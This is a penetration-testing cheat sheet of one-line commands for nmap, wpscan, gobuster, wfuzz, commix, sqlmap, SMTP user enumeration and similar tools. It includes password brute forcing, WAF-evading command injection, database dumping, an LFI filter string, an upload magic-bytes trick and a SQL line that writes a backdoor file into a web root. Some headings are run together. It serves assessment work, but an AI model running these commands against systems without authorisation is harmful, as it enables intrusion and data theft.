A cheat sheet selection of frequently utilized tools and commands for engagements. Consider it a reference guide to assist you during your cybersecurity assessments.
Nmap
# Nmap basic scans:
|
nmap -p- -sT -sV -A $IP
nmap -p- -sC -sV $IP --open
nmap -p- --script=vuln $IP
# HTTP-Methods:
|
nmap -p80,443 --script=http-methods --script-args http-methods.url-path='/directory/goes/here'
# Smb enumeration :
|
nmap --script smb-enum-shares
sed IPs:
grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' FILEWPScan & SSL
# full wpscan:
|
wpscan --url $URL --disable-tls-checks --enumerate p --enumerate t --enumerate u
# wpscan Brute Forceing:
|
wpscan --url $URL --disable-tls-checks -U users -P /usr/share/wordlists/rockyou.txt
# aggressive Plugin Detection:
|
wpscan --url $URL --enumerate p --plugins-detection aggressiveNikto
# nikto with SSL and Evasion:
|
nikto --host $IP -ssl -evasion 1DNS_Recon
# basic dns recon scan:
|
dnsrecon –d yourdomain.comGobuster
# gobuster directory:
|
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -k -t 30
# gobuster files:
|
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-files.txt -k -t 30
# gobuster for subdomains:
|
gobuster dns -d domain.org -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 30WFuzz
# fuzz directories
|
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"
# fuzz files
|
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL"
# fuzz users
|
wfuzz -c -z file,/opt/SecLists/Usernames/top-usernames-shortlist.txt --hc 404,403 "$URL"
# fuzz large words
|
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-words.txt --hc 404 "$URL"
# fuzzing xss
|
wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-BruteLogic.txt "$URL"
wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-Jhaddix.txt "$URL"
# command injection with post data
|
wfuzz -c -z file,/opt/SecLists/Fuzzing/command-injection-commix.txt -d "doi=FUZZ" "$URL"
# test for parameter
|
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt "$URL"
# authenticated fuzzing directories
|
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 -d "SESSIONID=value" "$URL"Command injection
# command Injection with commix, ssl, waf, random agent.
|
commix --url="https://supermegaleetultradomain.com?parameter=" --level=3 --force-ssl --skip-waf --random-agentSqlmap
# easy sqlmap
|
sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique=T --force-ssl
# sqlmap dump
|
sqlmap -u $URL --threads=2 --time-sec=10 --level=4 --risk=3 --dump
/SecLists/Fuzzing/alphanum-case.txtSocial recon
# get social
|
theharvester -d domain.org -l 500 -b googleSMTP user enumeration
# smtp user enumeration
|
smtp-user-enum -M VRFY -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M EXPN -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M RCPT -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M EXPN -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IPSSH Tunnel
└─$ ssh -L 10000:127.0.0.1:10000 user@$IPMisc
# command execution verification - ping check
|
tcpdump -i any -c5 icmp
# php filter check
|
php://filter/convert.base64-encode/resource=
# check network
|
netdiscover /r 0.0.0.0/24
# magic bytes for image upload
|
GIF89a1
# into outfile door
|
SELECT “” into outfile “/var/www/WEROOT/backdoor.php”;
# extract ip's from a text file:
|
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' nmapfile.txtBash
Pull out IPV4 Addresses
grep -E -o "([0-9]{1,3}\.){3}[0-9]{1,3}" your_file.txt
